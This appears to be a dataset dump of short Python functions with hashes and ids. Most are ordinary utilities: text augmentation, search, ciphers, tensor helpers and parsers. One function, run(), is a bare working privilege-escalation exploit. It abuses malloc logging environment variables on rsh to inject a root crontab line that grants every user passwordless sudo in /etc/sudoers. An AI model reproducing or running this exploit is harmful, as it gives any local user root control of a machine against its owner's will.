Dataset schema: content (string, 35 to 416k chars) · sha1 (string, 40 chars) · id (int64, 0 to 710k)
import random


def random_word_swap(sentence, p):
    """Swaps words from a sentence with probability p."""
    def swap_word(new_words):
        idx_1 = random.randint(0, len(new_words) - 1)
        idx_2 = idx_1
        counter = 0
        while idx_2 == idx_1:
            idx_2 = random.randint(0, len(new_words) - 1)
            counter += 1
            if counter > 3:
                return new_words
        new_words[idx_1], new_words[idx_2] = new_words[idx_2], new_words[idx_1]
        return new_words

    words = sentence.split(' ')
    new_words = words.copy()
    n = int(p * len(words))
    for _ in range(n):
        new_words = swap_word(new_words)
    sentence = ' '.join(new_words)
    return sentence
f81467776a3c1e8bae3fdb411bd95f8c6440fea2
24,550
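A quick illustrative run of the augmentation snippet above, assuming random_word_swap from the record is in scope (the sentence is made up; output depends on the RNG state):

import random

random.seed(0)  # fix the RNG so the swap is reproducible
print(random_word_swap("the quick brown fox jumps", 0.2))
# n = int(0.2 * 5) = 1, so exactly one swap is attempted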
def range_string_to_list(range_string):
    """Returns a list of the values represented by a range string."""
    if range_string == "":
        return []
    output = list()
    for x in range_string.split(","):
        y = x.split("-")
        if len(y) > 1:
            output.extend(range(int(y[0]), int(y[1]) + 1))
        else:
            output.append(int(y[0]))
    return output
30522a4faefbcc2e5d01fd5236915da5d897459a
24,551
def which_recovered(recovered_names, all_names):
    """Produce dictionary of recovered TRUE/FALSE."""
    recovery_dict = {}
    for name in all_names:
        if name in recovered_names:
            recovery_dict[name] = 'TRUE'
        else:
            recovery_dict[name] = 'FALSE'
    return recovery_dict
3a8885ad1f88af373db69f83df8d5a63b7c8facf
24,553
def is_array_type(rtype):
    """
    Test to see if return type parameter is a NumPy array.

    :param str rtype: Return type parameter.
    :return: *True* if return type parameter is a NumPy array, *False* if not.
    :rtype: bool
    """
    if rtype.lower() in ['ndarray', 'array', 'arr', 'np', 'a']:
        return True
    return False
6973a9e1830b89fea87c70e42df97bbfc39e49c2
24,554
import os


def find_input_path():
    """
    Walks backwards (two levels) until it locates the root pom.xml.
    This allows the module to run from multiple folder depths within
    the docs tree.
    """
    if os.path.exists("../pom.xml"):
        return "../"
    if os.path.exists("../../pom.xml"):
        return "../../"
a87e98f0f5dc6a01645c11476a1f79e79c4ac4de
24,555
def check_error_category(err_cat, err_msg, out_dict):
    """
    Check if a parser error of the non-critical category (err_cat != 1)
    is actually consistent and may be discarded.

    :param err_cat: the error category of the error message to be investigated
    :param err_msg: the error message
    :param out_dict: the dict of results obtained from the parser function

    :returns: True/False if message is an error or warning
    """
    # check special cases:
    # 1. nonco_angle_file not present, but newsosol == False anyway
    if 'NONCO_ANGLES_OUT' in err_msg:
        if "use_newsosol" in list(out_dict.keys()):
            if out_dict["use_newsosol"]:
                return True
            else:
                return False
        else:
            return True

    # default behavior
    if err_cat == 1:
        return True
    else:
        return False
a518f736b5711080363deffe840fc37404e40413
24,557
def convert_escaped_unicode_literal(text: str) -> str:
    """Convert any escaped Unicode literal hexadecimal character(s) to the
    proper character(s).

    This function will convert a string, that may contain escaped Unicode
    literal hexadecimal characters, into a string with the proper characters.

    Args:
        text (:obj:`str`): The string that may have escaped Unicode
            hexadecimal.

    :rtype: :obj:`str`
        A string with each escaped Unicode hexadecimal character converted
        into the proper character.

    The following Unicode literal formats are supported::

        \\x31
        \\u0031
        \\U00000031

    Examples:
        Basic usage::

            >>> from flutils.strutils import convert_escaped_unicode_literal
            >>> a = '\\\\x31\\\\x2e\\\\u2605\\\\x20\\\\U0001f6d1'
            >>> convert_escaped_unicode_literal(a)
            '1.★ 🛑'

        This function is intended for cases when the value of an environment
        variable contains escaped Unicode literal characters that need to
        be converted to proper characters::

            $ export TEST='\\x31\\x2e\\u2605\\x20\\U0001f6d1'
            $ python

        ::

            >>> import os
            >>> from flutils.strutils import convert_escaped_unicode_literal
            >>> a = os.getenv('TEST')
            >>> a
            '\\\\x31\\\\x2e\\\\u2605\\\\x20\\\\U0001f6d1'
            >>> convert_escaped_unicode_literal(a)
            '1.★ 🛑'
    """
    text_bytes = text.encode()
    return text_bytes.decode('unicode_escape')
27f50f0878f45b3637e284b9ec2d6a6098f56df6
24,558
def check_magnetic_atoms(in_path: str) -> list:
    """
    Args:
        in_path (str) - path to the POSCAR-type file prepared for the
            siman structure reader.
    Returns:
        magnetic_atoms (list) - list of magnetic atoms in prepared
            structures with "fake" atoms, e.g.

            >>> magnetic_atoms
            ['Po', 'Eu']
    """
    with open(in_path, 'r') as in_f:
        in_data = in_f.readlines()
        magnetic_atoms = in_data[5].split()[:2]
    return magnetic_atoms
b0428fea0767688823b30cab14a11052fed0d149
24,560
def new_feature_collection(features=None):
    """
    :param features: optional list of GeoJSON features
    :return: a GeoJSON FeatureCollection dict
    """
    # set features to empty list by default
    if features is None:
        features = []

    # build a geojson feature collection
    feature_collection = {
        "type": "FeatureCollection",
        "features": features
    }
    return feature_collection
5a58bedcbcfcd4e0a317dbde301e5bbb3221373b
24,561
def get_solver_param(sim_param=1):
    """Get parameters related to this simulation run."""
    theta = None
    deadline = None
    horizon = None
    solver_type = None

    if sim_param == 1:
        theta = 2
        deadline = 6
        horizon = 3
        solver_type = 'central'
    elif sim_param == 2:
        theta = 3
        deadline = 6
        horizon = 3
        solver_type = 'central'
    elif sim_param == 3:
        theta = 3
        deadline = 6
        horizon = 3
        solver_type = 'distributed'
    elif sim_param == 4:
        theta = 10
        deadline = 10
        horizon = 10
        solver_type = 'central'
    elif sim_param == 5:
        theta = 20
        deadline = 20
        horizon = 20
        solver_type = 'central'
    else:
        print("No other options available at this time")
        exit()

    return horizon, theta, deadline, solver_type
dd25af8c0c85791710ab1f0c60678e8bebc6d154
24,562
import torch
from typing import Callable
from typing import Iterable
from typing import Tuple


def make_batcher(
    x: torch.Tensor, y: torch.Tensor, batch_size: int
) -> Callable[[], Iterable[Tuple[torch.Tensor, torch.Tensor]]]:
    """Returns a function that can be called to yield batches over x and y."""
    assert x.shape[0] == y.shape[0]
    idxes = range(0, x.shape[0], batch_size)

    def batcher() -> Iterable[Tuple[torch.Tensor, torch.Tensor]]:
        for start in idxes:
            end = start + batch_size
            yield x[start:end], y[start:end]

    return batcher
2bcb36b9eca07f86aed565a437bdb2b9b5cb21f6
24,564
def momentum(prices):
    """This function finds the momentum metric for a group of assets.

    Inputs:
    -------
        prices (pandas DataFrame | Series): dataframe with the information
            of the prices of a group of assets or an individual asset.

    Outputs:
    --------
        momentum_df (pandas DataFrame): dataframe with the information of
            the momentum.
    """
    # Compute components:
    first = prices.iloc[0]
    last = prices.iloc[-1]

    # Compute momentum:
    momentum_df = last / first
    return momentum_df
442c24b0602877293aa03b905f3ce47692a3cc21
24,566
import re


def munge_subject_to_filename(subject):
    """Derive a suitable filename from a commit's subject."""
    if subject.endswith('.patch'):
        subject = subject[:-6]
    return re.sub(r'[^A-Za-z0-9-]+', '_', subject).strip('_').lower() + '.patch'
b67350f2f4003f04c234103a2e3f7f1bf34dedbf
24,567
def abstract_class(cls_):
    """Decorate a class, overriding __new__.

    Prevents a class from being instantiated, similar to abc.ABCMeta,
    but does not require an abstract method.
    """
    def __new__(cls, *args, **kwargs):
        if cls is cls_:
            raise TypeError(
                f'{cls.__name__} is an abstract class and may not be instantiated.')
        return object.__new__(cls)

    cls_.__new__ = __new__
    return cls_
15e6f5472b3a6e29ad26fd9c705ea418e9917ceb
24,569
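A minimal usage sketch for the decorator above (class names are illustrative), assuming abstract_class from the record is in scope:

@abstract_class
class Base:
    pass

class Child(Base):
    pass

Child()        # fine: only the decorated class itself is blocked
try:
    Base()     # raises TypeError from the overridden __new__
except TypeError as e:
    print(e)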
def SmoothWrap(histogram, window_size):
    """Smooth histogram by the sliding-window method, where the window is
    wrapped around the borders. The sum of all values is entered at the
    center of the window.
    """
    new_histogram = [0] * len(histogram)
    half_window_size = window_size // 2  # integer division: used as an index below
    length = len(histogram)

    # 1. start with window
    cumul = 0
    for i in range(length - half_window_size, length):
        cumul = cumul + histogram[i]
    for i in range(0, half_window_size + 1):
        cumul = cumul + histogram[i]

    # 2. iterate over histogram and add values over window_size
    y = length - half_window_size
    z = half_window_size
    for i in range(0, length):
        new_histogram[i] = cumul
        y = y + 1
        z = z + 1
        if y >= length:
            y = 0
        if z >= length:
            z = 0
        cumul = cumul - histogram[y] + histogram[z]

    return new_histogram
0fccbab170a140645a6354c7d0d02f94a1c12f0a
24,571
def is_upvoted(submission):
    """
    If a submission is upvoted, we assume the question is welcomed, and
    that there's no need for a template answer.
    """
    min_score = 3
    min_comment_count = 1
    return (
        submission.score > min_score
        and len(submission.comments) > min_comment_count
    )
90fe43e6cd681a15daa97dba039e7fa94ac617ca
24,572
from typing import Optional
from typing import Type
from typing import Callable


def register_operator(
    cls: Optional[Type] = None, *, sql_operator: Optional[Callable] = None
):
    """Register a class as an operator class.

    :param cls: Register an operator without providing a builtin
        SQLAlchemy operator.
    :param sql_operator: A SQLAlchemy operator or a custom callable that
        acts as a SQLAlchemy operator.
    """
    def decorator(clazz: Type):
        clazz.operator = property(lambda self: sql_operator)
        return clazz

    if cls is not None:
        return decorator(cls)
    return decorator
faeb551715c23871ce1e87c1c2234b02ebb14611
24,573
import asyncio


def get_task_id():
    """Return the current task's identity."""
    return id(asyncio.current_task())
b99fdc06cd089b6e3e1b93e056f0018ca6a0ad55
24,574
def min_max_scale(tensor, min_val=0, max_val=1, dim=0):
    """Rescale values to lie in a given range across dim."""
    tensor = tensor.float()
    t_min = tensor.min(dim=dim, keepdim=True)[0]
    t_max = tensor.max(dim=dim, keepdim=True)[0]
    std_tensor = (tensor - t_min) / (t_max - t_min)
    scaled_tensor = std_tensor * (max_val - min_val) + min_val
    return scaled_tensor
a064b2c8ca098448cb6a665f716411278641713a
24,575
import os


def auto_mtime(fn):
    """
    Gets the mtime of fn, or None if the file does not exist.
    """
    try:
        return os.path.getmtime(fn)
    except OSError:  # getmtime raises OSError for a missing file
        return None
632ff58594836c532c3a3a56c338b0149736875a
24,576
from typing import List
import os
import re


def read_requirements(path: str) -> List[str]:
    """
    Load the requirements, supporting the `-r` option to load dependent
    requirement files.
    """
    with open(path, 'r', encoding='utf-8') as f:
        all_reqs = f.read().split('\n')

    # find embedded requirements inside (i.e., `-r <other requirements>`)
    # "pip install -r <file>" handles nested requirements, so do that too here
    root = os.path.dirname(path)
    sub_reqs = []
    filtered_reqs = []
    for x in all_reqs:
        m = re.findall(r'^-r\s+(\S+)', x)
        if len(m) == 1:
            sub_reqs += read_requirements(os.path.join(root, m[0]))
        elif len(x) > 0:
            filtered_reqs.append(x)

    return filtered_reqs + sub_reqs
e170e32139ad42d3a17a1f517b34810dfffb213e
24,577
def encode(message, rails):
    """Encode the message."""
    rows, ind, direction = ["" for i in range(rails)], 0, 1
    for char in message:
        rows[ind] += char
        ind += direction
        if ind in [rails, -1]:
            direction *= -1
            ind += direction * 2
    return "".join(rows)
87404107afa970db1597dbda4dfee9b52bf1b893
24,579
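The zigzag pattern above is the classic rail-fence cipher; a small check, assuming encode from the record is in scope:

# characters are laid onto 3 "rails" in a zigzag, then read row by row
assert encode("WEAREDISCOVEREDFLEEATONCE", 3) == "WECRLTEERDSOEEFEAOCAIVDEN"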
import os


def get_var(var_name: str):
    """Get an ENV VAR."""
    return os.environ[var_name]
eba1aecbd6a3aa57eef043f50a927efe26963756
24,580
def get_label(filename, labels=["head", "body", "arm", "tail", "leg", "ear"]):
    """
    If the filename contains a word from the list called labels, return a
    pair of name and id number.

    example:
        get_label("./raccoon/labels/head.ply", ["head", "leg"]):
            returns ("head", 0)
        get_label("./raccoon/somefilename.ply", ["goose", "raccoon"]):
            returns ("raccoon", 1)
    """
    for label in labels:
        if label.lower() in filename.lower():
            return (label, labels.index(label))
    return -1
    # raise Exception("There exists no label with " + filename + ". Provide the label of the contained file through the folder name or filename.")
6c83e714de6c0b4959524110ac8dbe2f5210485d
24,581
def mendeleev(n):
    """Links atomic number with atom type."""
    periodic_table = {
        1: "H", 2: "He",
        3: "Li", 4: "Be", 5: "B", 6: "C", 7: "N", 8: "O", 9: "F", 10: "Ne",
        11: "Na", 12: "Mg", 13: "Al", 14: "Si", 15: "P", 16: "S", 17: "Cl", 18: "Ar",
        19: "K", 20: "Ca", 21: "Sc", 22: "Ti", 23: "V", 24: "Cr", 25: "Mn",
        26: "Fe", 27: "Co", 28: "Ni", 29: "Cu", 30: "Zn", 31: "Ga", 32: "Ge",
        33: "As", 34: "Se", 35: "Br", 36: "Kr", 53: "I"
    }
    return periodic_table.get(n)
9c403b510be36b846400ba40b91e8a430f2a48b7
24,582
from typing import Tuple


def api_keys(api_keys_function) -> Tuple[str, str]:
    """
    Fixture that saves an api key / api secret pair in the database and
    returns a tuple (ApiKey, ApiSecret). This fixture does automatic
    cleanup (deletes the pair from the database) after the test run.

    :return: Returns a tuple of api key and secret.
    """
    return api_keys_function()
a7cf5c1b35c88d6e8a4e9635a2ac7f74534acc50
24,583
def do_find(lookup: dict, term: str) -> list:
    """Match term against keywords."""
    output = []
    seen = set()
    for emoji, keywords in lookup.items():
        for keyword in keywords:
            if term in keyword and emoji not in seen:
                output.append((keywords[0], emoji))
                seen.add(emoji)
    return output
bd0493fd2714622a9faa1dcf8b177b0537061aeb
24,584
def _get_dropbox_path_from_dictionary(info_dict, account_type):
    """
    Returns the 'path' value under the account_type dictionary within the
    main dictionary.
    """
    return info_dict[account_type]['path']
0869c08cd9d0f70d9dcdeb5bee843a6c9046d5bc
24,585
def binary_search(array, value):
    """Search for value in sorted array, using binary search.

    Continually divide the (sub-)array in half until value is found, or
    the entire array has been searched. Iterative approach.

    Parameters
    ----------
    array : list
        List to search. Must be sorted.
    value : any
        Value to search for. Must be same type as elements in array.

    Returns
    -------
    bool
        True if array contains value, False otherwise
    """
    # Set starting indexes, which will be used to index sub-array as it shrinks
    low = 0
    high = len(array) - 1

    # Keep searching until low and high pointers cross
    while low <= high:
        mid = (high + low) // 2
        # Check to see if dividing index (mid) equals value we're searching for
        if array[mid] == value:
            return True
        elif value < array[mid]:
            # -1 since we don't want to check the value at mid again (redundant)
            high = mid - 1
        else:
            # +1 since we don't want to check the value at mid again (redundant)
            low = mid + 1

    return False
08fc6be6571854a0003a7ccc354c397dfb791059
24,586
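A few spot checks for the search above (including the single-element edge case), assuming binary_search from the record is in scope:

assert binary_search([1, 3, 5, 7, 9], 7) is True
assert binary_search([1, 3, 5, 7, 9], 4) is False
assert binary_search([5], 5) is True  # a one-element range is still checked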
from typing import Tuple


def blend_colors(
    rgba: Tuple[int, int, int, float], rgb: Tuple[int, int, int]
) -> Tuple[int, int, int]:
    """Get the resulting RGB color of an RGBA color rendered over an RGB color."""
    red = (rgba[0] * rgba[3]) + (rgb[0] * (1 - rgba[3]))
    green = (rgba[1] * rgba[3]) + (rgb[1] * (1 - rgba[3]))
    blue = (rgba[2] * rgba[3]) + (rgb[2] * (1 - rgba[3]))
    result_color = int(red), int(green), int(blue)
    return result_color
bf48b7193002a48aa8996c543c3bd5633ae06362
24,587
import itertools


def cc_barrett_optimized(net, node, anet, undefReturn=0.0):
    r"""Multiplex clustering coefficient defined by Barrett et al.

    See SI of "Taking sociality seriously: the structure of multi-dimensional
    social networks as a source of information for individuals.",
    Louise Barrett, S. Peter Henzi, David Lusseau,
    Phil. Trans. R. Soc. B 5 August 2012 vol. 367 no. 1599 2108-2118

    \frac{\sum_j^n \sum_h^n \sum_k^b ( a_{ijk} \sum_l^b (a_{ihl} \sum_m^b a_{jhm} ) )}
         {\sum_j^n \sum_h^n \sum_k^b ( a_{ijk} \sum_l^b \max(a_{ihl},a_{jhl}) )}
    """
    degree = anet[node].deg()
    if degree >= 2:
        nom, den = 0, 0
        for i, j in itertools.combinations(anet[node], 2):
            nij = anet[node][i] * anet[node][j]
            ij = anet[i][j]
            if ij != anet.noEdge:
                nom += nij * ij
        ineighs = set(anet[node])
        for j in anet[node]:
            jneighs = set(anet[j])
            for h in ineighs | jneighs:
                m = 0
                if net.fullyInterconnected:
                    layers = net.slices[1]
                else:
                    layers = net._nodeToLayers[h]
                for layer in layers:
                    m += max(net[node, h, layer], net[j, h, layer])
                den += anet[node, j] * m
        if den != 0.0:
            return 2 * nom / float(den)
        else:
            return undefReturn
    else:
        return undefReturn
f13ebf0e85deaf1e332e9bfd9613b406681188c1
24,588
def stripnl(s):
    """Remove newlines from a string."""
    return str(s).replace("\n", " ")
da0a46707b19b6faa054cd1e4dad96b9651b3f0b
24,589
from typing import List


def solution(board: List[List[int]]) -> int:
    """
    Find the largest square of 1s in the given 2-D array.

    Args:
        board (List[List[int]]): 2-D array whose elements are 0 or 1.

    Returns:
        int: area of the largest square.
    """
    row, column = len(board), len(board[0])
    global_max = 0
    for i in range(row):
        for j in range(column):
            if not (i and j):
                # first row/column: a cell can only start a square of size 1
                global_max = board[i][j] if board[i][j] > global_max else global_max
                continue
            if board[i][j]:
                near = [board[i - 1][j - 1], board[i - 1][j], board[i][j - 1]]
                board[i][j] = min(near) + 1
                global_max = board[i][j] if board[i][j] > global_max else global_max
    return global_max * global_max
a34b7decafc1dc79bce566335e4edba7900e7744
24,592
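A worked example for the dynamic-programming snippet above (the board is illustrative); each 1-cell is rewritten to the side length of the largest square ending at that cell:

board = [[0, 1, 1, 1],
         [1, 1, 1, 1],
         [1, 1, 1, 1],
         [0, 0, 1, 0]]
print(solution(board))  # 9: a 3x3 square of 1s is the largest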
import re


def distribute(string, delim, groups=[r'\S+', r'\S+']):
    r"""Distributes one part of a string to other parts of that string
    (separated by a delimiter), returning a list of strings.

    Args:
        string: input string
        delim: regex matching delimiter between two parts of string to be
            distributed upon
        groups: list of regular expressions that match the parts of the
            string receiving the distributed portion of the string.
            defaults to [r'\S+', r'\S+'] (i.e. two blocks of non-whitespace)

    Returns:
        If delimiter and groups are found, returns a list of strings.
        If they are not found, returns a list containing just the
        original string.

    Examples:
        >>> distribute('hot spam/eggs', r'/')
        ['hot spam', 'hot eggs']
        >>> distribute('hot spam/eggs on toast', r'/')
        ['hot spam on toast', 'hot eggs on toast']
        >>> distribute('hot spam/eggs on toast', r'/', [r'\S+', r'\S+ on toast'])
        ['hot spam', 'hot eggs on toast']
    """
    output = []
    n = len(re.findall(delim, string)) + 1
    gps = groups + [groups[-1]] * (n - len(groups))
    rx = re.compile(delim.join([r'(' + group + r')' for group in gps]))
    re_match = rx.search(string)
    if re_match:
        output = [rx.sub(re_match.group(i), string) for i in range(1, n + 1)]
    else:
        return [string]
    return output
3b64474cabdf755bd41088e9e7f8d8a6e20adec4
24,593
import torch


def integral_vector(X, theta, l, mu, cov):
    """
    X : (n,d) tensor
    theta : 0d tensor or float
    l : (d,) tensor
    mu : (d,) tensor
    cov : (d,d) tensor
    outputs (n,) tensor
    """
    C = cov + torch.diag(l ** 2)
    # torch.cholesky/torch.triangular_solve are deprecated; use torch.linalg
    L = torch.linalg.cholesky(C)  # lower-triangular by default
    Xm = X - mu  # (n, d)
    LX = torch.linalg.solve_triangular(L, Xm.transpose(1, 0), upper=False)  # (d, n)
    exponent = -0.5 * torch.sum(LX ** 2, dim=0)  # (n,)
    det = torch.prod(1 / l ** 2) * torch.prod(torch.diag(L)) ** 2  # |I + A^-1 B|
    vec = theta / torch.sqrt(det) * torch.exp(exponent)  # (n,)
    return vec
7fa550f6d642aa5459e1e4f3ce3c08e20e73c6c9
24,594
def showDag(n=None):
    """
    showDag(n) -> None

    Show the tree view of a group node or open a node control panel.
    @param n: Optional Group.
    @return: None
    """
    return None
9fa1866bcfa470220b26493cd934002005446b49
24,596
def handle_connection_error(err):
    """Connection exception handler."""
    return 'docker host not found: ' + str(err), 500
95c5c75758653fb701001ca6c9943481276bd652
24,597
import torch


def observability_matrix(A, C, m):
    """
    Create the observability matrix [C; CA; CA^2; ...; CA^(m-1)].

    Args:
        A: state matrix, (n, n) tensor
        C: output matrix, (p, n) tensor
        m: number of block rows

    Returns:
        The stacked observability matrix.
    """
    Om = torch.cat([C, torch.matmul(C, A)], dim=0)
    for i in range(2, m):
        # torch.pow is element-wise; the block rows need matrix powers of A
        CA_product = torch.matmul(C, torch.linalg.matrix_power(A, i))
        Om = torch.cat([Om, CA_product], dim=0)
    return Om
59d38a1f787cd10969f8b56024549d0656801513
24,598
def throttle_angle_to_thrust(r, theta):
    """Assumes theta in degrees and r = 0 to 100 %.
    Returns a tuple of percentages: (left_thrust, right_thrust)."""
    theta = ((theta + 180) % 360) - 180       # normalize value to [-180, 180)
    r = min(max(0, r), 100)                   # normalize value to [0, 100]
    v_a = r * (45 - theta % 90) / 45          # falloff of main motor
    v_b = min(100, 2 * r + v_a, 2 * r - v_a)  # compensation of other motor
    if theta < -90:
        return -v_b, -v_a
    if theta < 0:
        return -v_a, v_b
    if theta < 90:
        return v_b, v_a
    return v_a, -v_b
0f8b11d1c6de0674602f92f577e83e026b31e727
24,599
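Two illustrative calls for the thrust-mixing function above, assuming it is in scope:

print(throttle_angle_to_thrust(100, 0))   # (100, 100.0): full thrust on both motors
print(throttle_angle_to_thrust(100, 90))  # (100.0, -100): pivots right in place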
import random


def generateColor(text):
    """Deterministically generates a colour for a given text."""
    random.seed(text)
    return '#%06X' % random.randint(0, 0xFFFFFF)
6577ba33642b68bdef3d1cec914078fa1d2b8b27
24,600
from typing import List
from typing import Tuple
from typing import Union


def _parse_array(tokens: List[str]) -> Tuple[Union[list, str], List[str]]:
    """
    >>> _parse_array(list("1,{2,3}};abc"))
    (['1', ['2', '3']], [';', 'a', 'b', 'c'])
    >>> _parse_array(list("1}"))
    (['1'], [])
    >>> _parse_array(list(""))
    ([], [])
    """
    array: List[Union[list, str]] = []
    while tokens:
        token, *tokens = tokens
        if token == "}":
            return array, tokens
        if token == "{":
            sub_array, tokens = _parse_array(tokens)
            array.append(sub_array)
            assert tokens[0] == "}" or tokens[0] == ","
        elif token != ",":
            array.append(token)
    return array, tokens
6239a89691d47a43ddd8febcb77e8c90fd4944e3
24,601
def delete_var(var, detach=False, breakline=True):
    """Query for deleting the input variable.

    Parameters
    ----------
    var
        Name of the variable to remove
    detach
        Prepend "DETACH " to the query when True
    breakline
        Append a newline to the query when True
    """
    # use a separate prefix variable: reassigning the detach argument to ""
    # before testing it would make the DETACH branch unreachable
    prefix = ""
    n = ""
    if detach is True:
        prefix = "DETACH "
    if breakline:
        n = "\n"
    return "{}DELETE {}{}".format(prefix, var, n)
b2f4cf80ab3319b81123c4a9cc4fb238b1db6dd3
24,605
def unit_size(size):
    """Convert a size in bytes to KB/MB/GB/TB."""
    units = ['KB', 'MB', 'GB', 'TB']
    i = 0
    size = size / 1024
    while size >= 1024 and i < (len(units) - 1):
        i = i + 1
        size = size / 1024
    return '%.2f %s' % (size, units[i])
9f174d94cd7c3e57399f0689d67c35fe97da5e23
24,607
def tally_output(cons_file, output_path, file_stem):
    """Writes a tally file for easy graphing/analysis."""
    tally_file = "{}/{}.tally".format(output_path, file_stem)
    with open(cons_file, "r") as reader, open(tally_file, "w") as writer:
        for line in reader:
            if line.startswith('#'):
                writer.write(line.split('# ')[1])
    return tally_file
02c1b20a1e71482344e5ad8516a2f8ed86429a60
24,608
import os


def relation_id():
    """The relation ID for the current relation hook."""
    return os.environ.get('JUJU_RELATION_ID', None)
8773099418d238d90d95e2b2cadcc06f238e3013
24,609
import os


def _make_default_output_name(input_dir, input_type):
    """Create filename by concatenating 'input_dir'/processed_'input_type'.json."""
    input_dir = input_dir.rstrip(os.path.sep)
    return os.path.join(os.path.dirname(input_dir),
                        "processed_%s.json" % input_type)
d0e1300fbfac9b0d515f8855477644a91e807dee
24,610
def calc_check_sum(data):
    """
    Compute and return the checksum of data[2:-2].

    @param data: the data; must be at least 4 bytes long
    @return the checksum
    """
    cksum = 0
    for i in range(2, len(data) - 2):
        cksum += data[i]
    return cksum % 65536
d44e362528ac47a037ed7dbc32a3ca32c04dba54
24,611
def find_constant_parameters(parameter_array):
    """
    Checks which parameters are constant.

    :param parameter_array: Return array from parameter.get_parameter_array(setup)
    :return: A True/False array with len(result) == len(parameter_array)
    """
    return parameter_array['maxbound'] - parameter_array['minbound'] == 0.0
a0153d39065d48a1a519ff029e76ab030bd444d3
24,614
def project_is_connected(project, user):
    """
    Return True if the given project is connected (joined and authorized).
    """
    return project.is_joined(user)
7d513406f1ec66eb57d8f7a6f0dc5688d521f755
24,617
def ds_from_s(distance):
    """
    Calculate {displacement} from {distance}.

    The chosen scheme: displacement at [i] represents the distance
    from [i-1] to [i].

    Args:
        {distance_arg}

    Returns:
        {displacement_returns}
    """
    # Should this assume the index at position 0 is 0, or should this
    # assume the only NaN is at position 0? Assumptions either way...
    # Also could accomplish this behavior with bfill. Hmm.
    return distance.diff().fillna(distance[0])
0e1e419aa0fe6f5dbc20a8cda2cdcd08d74e418d
24,619
def pssm_recovery_map_range(struct, pssm_map, min, max):
    """Calculate the PSSM recovery within a range of B factors, given a
    structure and a PSSM map."""
    struct_residues = struct.get_residues()
    recovery_map = {}
    for residue in struct_residues:
        score = residue.get_list()[1].get_bfactor()
        if score >= min and score <= max:
            residue_name = residue.get_resname()
            residue_num = residue.get_id()[1]
            status = pssm_map.conserved(residue_num, residue_name)
            if status:
                try:
                    recovery_map[residue_name] += 1
                except KeyError:
                    recovery_map[residue_name] = 1
    return recovery_map
805bbba61e754f9fc6242e09a98ffa891af2434b
24,621
import os
import time


def run():
    """Runs the exploit."""
    size = os.stat("/etc/sudoers").st_size
    env = dict()
    env["MallocLogFile"] = "/etc/crontab"
    env["MallocStackLogging"] = "yes"
    env["MallocStackLoggingDirectory"] = (
        'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n'
    )
    print("Trying /etc/crontab...")
    pid = os.fork()
    if pid == 0:
        os.close(1)
        os.close(2)
        os.execve("/usr/bin/rsh", ["rsh", "localhost"], env)
    time.sleep(1)
    try:
        crontab = open("/etc/crontab").read()
        if "NOPASSWD" not in crontab:
            return
    except IOError:
        return
    print("Done \nWaiting for /etc/sudoers to change (<60 seconds)...")
    while os.stat("/etc/sudoers").st_size == size:
        print(".")
        time.sleep(1)
    return True
11143ba539260f92be09c83d5f5429c2fa398bdd
24,626
def filter_lower_case_keys(dict):
    """
    Filter dict to include only lower-case keys.

    Used to skip HTTP response fields.

    :param dict: Dict with all capabilities parsed from the SSDP discovery.
    :return: Dict with lower-case keys only.
    """
    return {key: value for key, value in dict.items() if key.islower()}
f441202f6ae66ab023431c42680f349169ea0f79
24,627
import textwrap


def _wrap_data_with_information(data: str, paste_url: str) -> str:
    """
    Adds an "information line" to the bottom of the paste content
    identifying where said paste information came from.

    data - the data we want to wrap
    paste_url - the URL from which this data came

    returns the wrapped data
    """
    return data + textwrap.dedent(f"""
        This data can also be found in pastebin, at the following URL:
        {paste_url}""")
bae7bbe49b3a8be2d485b6be21ea6f18b40383e1
24,628
def clean_constant_rows(data):
    """Drop rows with constant values.

    Parameters:
        data (pd.DataFrame): Data from an html table

    Returns:
        data (pd.DataFrame): Data from an html table

    Raises:
        None
    """
    data = data.transpose()
    data = data.loc[:, (data != data.iloc[0]).any()]
    data = data.transpose().reset_index(drop=True)
    return data
59c0472ad44b3a60c53aa9d412f7a423281b4892
24,633
def find_abs_death_props(params, abs_props):
    """
    Calculate the absolute proportion of all patients who should eventually
    reach hospital death or ICU death.
    """
    # Find the IFR that needs to be contributed by ICU and non-ICU hospital deaths
    hospital_death, icu_death = [], []
    for i_agegroup, agegroup in enumerate(params["all_stratifications"]["agegroup"]):

        # If the IFR for the age group is greater than the absolute proportion
        # hospitalised, increase the hospitalised proportion
        if params["adjusted_infection_fatality_props"][i_agegroup] > \
                abs_props["hospital"][i_agegroup]:
            abs_props["hospital"][i_agegroup] = \
                params["adjusted_infection_fatality_props"][i_agegroup]

        # Find the target absolute ICU mortality and the amount left over
        # from the IFRs to go to hospital, if any
        target_icu_abs_mort = \
            abs_props["icu"][i_agegroup] * \
            params["icu_mortality_prop"]
        left_over_mort = \
            params["adjusted_infection_fatality_props"][i_agegroup] - \
            target_icu_abs_mort

        # If some IFR will be left over for the hospitalised
        if left_over_mort > 0.:
            hospital_death.append(left_over_mort)
            icu_death.append(target_icu_abs_mort)

        # Otherwise if all the IFR is taken up by ICU
        else:
            hospital_death.append(0.0)
            icu_death.append(params["adjusted_infection_fatality_props"][i_agegroup])

    return {"hospital_death": hospital_death, "icu_death": icu_death}
120e1fe46344e674f5240b075cb78d8d4b5d2155
24,635
def supports_int(value: object) -> bool:  # noqa: E302
    """Check if an int-like object has been passed (:class:`~typing.SupportsInt`).

    Examples
    --------
    .. code:: python

        >>> from nanoutils import supports_int

        >>> supports_int(1.0)
        True

        >>> supports_int(1.5)
        False

        >>> supports_int(1)
        True

        >>> supports_int('1')
        True

        >>> supports_int('not a int')
        False

    Parameters
    ----------
    value : :class:`object`
        The to-be evaluated object.

    Returns
    -------
    :class:`bool`
        Whether or not the passed **value** is int-like or not.
    """
    # floats that can be exactly represented by an integer are also fine
    try:
        int(value)  # type: ignore
        return float(value).is_integer()  # type: ignore
    except Exception:
        return False
c7a920837a080030d1300c99951d887ed4917091
24,637
from typing import Callable
from typing import Dict
from typing import Any


def memoized(func: Callable) -> Callable:
    """Decorator that caches values returned by a function for future calls.

    The first time func is called with a particular sequence of arguments,
    the result is computed as normal. Any subsequent calls to func with the
    same sequence of arguments will then return the same value without
    requiring it to be recomputed.
    """
    memo: Dict[Any, Any] = {}

    def memo_func(*args: Any) -> Any:
        if args not in memo:
            memo[args] = func(*args)
        return memo[args]

    return memo_func
fd348711215713aff3361cfc47609634a457de88
24,638
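A small usage sketch of the decorator above (fib is illustrative), assuming memoized from the record is in scope:

@memoized
def fib(n: int) -> int:
    return n if n < 2 else fib(n - 1) + fib(n - 2)

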